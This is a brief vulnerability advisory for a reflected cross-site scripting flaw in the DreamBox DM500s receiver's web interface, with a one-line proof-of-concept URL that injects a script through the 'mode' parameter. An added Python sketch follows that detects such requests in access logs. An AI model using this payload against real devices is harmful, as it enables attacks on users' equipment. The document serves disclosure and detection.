DreamBox DM500s suffers from a cross-site scripting vulnerability.
# DreamBox DM500s Reflected XSS
# Vendor: Dream Multimedia GmbH
# Product web page: http://www.dream-multimedia-tv.de
# Summary: The Dreambox DM500s is a Linux-powered DVB satellite, terrestrial and cable digital television receiver (set-top box).
# Tested on: Linux Kernel 2.6.9, The Gemini Project, Enigma
# Vulnerability discovered by: Jay Turla (@shipcod3)
PoC:
http://192.168.1.10/body?mode=zap52b06%3Cscript%3Ealert%28%27shipcod3%27%29%3C%2fscript%3Eca184&zapmode=0&zapsubmode=4
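
Detection sketch for the request shape in the PoC above, as an added example that is not part of the original advisory or the vendor's code: it flags log entries where a query parameter sent to `/body` decodes to HTML metacharacters. The Common Log Format layout, the sample log lines and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Characters that let a reflected value break out of HTML text or an attribute.
HTML_META = re.compile(r"[<>\"'`]")
# Request line inside a Common Log Format entry: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample entries (assumed log format); line 2 reuses the PoC query.
SAMPLE_LOG = [
    '192.0.2.7 - - [01/Jan/2024:10:00:00 +0000] "GET /body?mode=zap&zapmode=0&zapsubmode=4 HTTP/1.1" 200 512',
    '192.0.2.9 - - [01/Jan/2024:10:00:05 +0000] "GET /body?mode=zap52b06%3Cscript%3Ealert%28%27shipcod3%27%29%3C%2fscript%3Eca184&zapmode=0&zapsubmode=4 HTTP/1.1" 200 640',
    '192.0.2.9 - - [01/Jan/2024:10:00:09 +0000] "GET /body?mode=zap%253Cb%253E&zapmode=0 HTTP/1.1" 200 530',
]

def fully_decode(value, rounds=3):
    """Percent-decode until stable; logged values may be encoded more than once."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(target, path="/body"):
    """Return names of query parameters on `path` that carry HTML metacharacters."""
    parts = urlsplit(target)
    if parts.path != path:
        return []
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    return [name for name, value in pairs if HTML_META.search(fully_decode(value))]

def scan(lines):
    """Yield (line_number, parameter_names) for each flagged log entry."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        hits = suspicious_params(match.group(1)) if match else []
        if hits:
            yield number, hits

if __name__ == "__main__":
    for number, names in scan(SAMPLE_LOG):
        print(f"line {number}: HTML metacharacters in {', '.join(names)}")
```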